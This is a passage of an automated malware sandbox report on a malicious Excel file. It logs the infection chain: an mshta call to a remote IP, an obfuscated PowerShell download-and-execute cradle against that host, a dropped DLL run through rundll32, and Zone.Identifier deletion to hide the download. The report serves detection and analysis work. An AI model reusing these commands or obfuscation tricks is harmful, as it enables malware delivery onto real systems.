                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00314B87
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031D389
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00307FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003059F2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030DFF3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00316DF8
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_003195FA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00318BE3
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0031DBEA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00317DD5
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00302BD9
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00319BCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_00309DCF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 14_2_0030E5CF
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040044F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F9011
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003FF8FD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004020BA
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00404116
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0040473C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F7FF2
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_004113AD
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F3E3F
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F3C3C
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_003F7C37
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00406C49
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_00400E53
                            Source: 476C.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                            Source: CJ68000754184.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: CJ68000754184.xlsMacro extractor: Sheet name: REEEEEEEE
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76F90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E90000 page execute and read and write
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0022E249 DeleteService,
                            Source: CJ68000754184.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPEDMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\Jump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10032B38 appears 108 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100201F1 appears 34 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100200FD appears 72 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D27 appears 288 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 1001F9FC appears 52 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10030D5A appears 82 times
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 100359C1 appears 46 times
                            Source: CJ68000754184.xlsOLE indicator, VBA macros: true
                            Source: CJ68000754184.xls.0.drOLE indicator, VBA macros: true
                            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@21/9@2/48
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                            Source: CJ68000754184.xlsOLE indicator, Workbook stream: true
                            Source: CJ68000754184.xls.0.drOLE indicator, Workbook stream: true
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,
                            Source: CJ68000754184.xlsVirustotal: Detection: 13%
                            Source: CJ68000754184.xlsReversingLabs: Detection: 18%
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................P...............................P.......................`I.........v.....................K......h.b.............................
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k....................................}..v....@.......0...............................T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k..... ..............................}..v............0...............h.b.............T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k....................................}..v............0...............................T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w......................!k....H.b.............................}..v............0.................b.............T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................!k....................................}..v............0...............................T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....#.................!k......b.............................}..v....X.......0...............x.b.............T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....'...............x.!k....E...............................}..v............0...............H.b.............T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+...............x.!k....E...............................}..v............0...............H.b.............T...............
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............x.......:.......T...............
                            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
                            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
                            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
                            Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE436.tmpJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                            Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
                            Source: 476C.tmp.0.drInitial sample: OLE indicators vbamacros = False
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038808D0 push 8B49032Eh; iretd
                            Source: C:\Windows\System32\mshta.exeCode function: 4_3_038800BE push 8B49032Eh; iretd
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10032B7D push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10030DFF push ecx; ret
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                            Source: JooSee.dll.6.drStatic PE information: real checksum: 0x8df98 should be: 0x9130d
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\JooSee.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)Jump to dropped file
                            Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)Jump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm:Zone.Identifier read attributes | delete
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_100134F0 IsIconic,
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
